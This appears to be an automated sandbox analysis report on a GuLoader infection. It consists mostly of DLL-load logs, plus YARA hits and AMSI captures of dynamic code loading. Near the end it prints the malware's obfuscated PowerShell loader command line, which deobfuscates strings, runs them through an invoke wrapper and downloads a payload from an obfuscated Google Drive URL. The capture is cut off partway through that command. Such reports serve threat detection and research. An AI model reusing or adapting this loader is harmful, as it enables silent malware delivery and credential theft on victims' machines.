Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Section loaded: iertutil.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.878914102008.0000000007121000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 0000000D.00000002.878904636075.0000000002A96000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: re.pdb; source: powershell.exe, 0000000D.00000002.878917749751.0000000008791000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 0000000D.00000002.878904636075.0000000002A96000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbGCTL source: GrOcCQC.exe, 00000010.00000000.879000905723.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe, 00000012.00000002.879083099115.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe.15.dr
Source:	Binary string: wab.pdb source: GrOcCQC.exe, GrOcCQC.exe, 00000010.00000000.879000905723.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe, 00000012.00000002.879083099115.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe.15.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000000D.00000002.878919425134.0000000008CCF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.878918969194.0000000008A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Discophile)$global:Refracting = [System.Text.Encoding]::ASCII.GetString($Joviality)$global:Effected=$Refracting.substring($Pushmina119,$Faseforvrngning)<#sundayproof costlew Semidito
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unmortised252 $Forgodtbefindendets $Bilaan), (Sandsynliggrer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Nonvillager = [AppDomain]::CurrentDomain.GetAs
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($kantning)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Bifurcations, $false).DefineType($realeksaminen,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Discophile)$global:Refracting = [System.Text.Encoding]::ASCII.GetString($Joviality)$global:Effected=$Refracting.substring($Pushmina119,$Faseforvrngning)<#sundayproof costlew Semidito

Obfuscated command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni 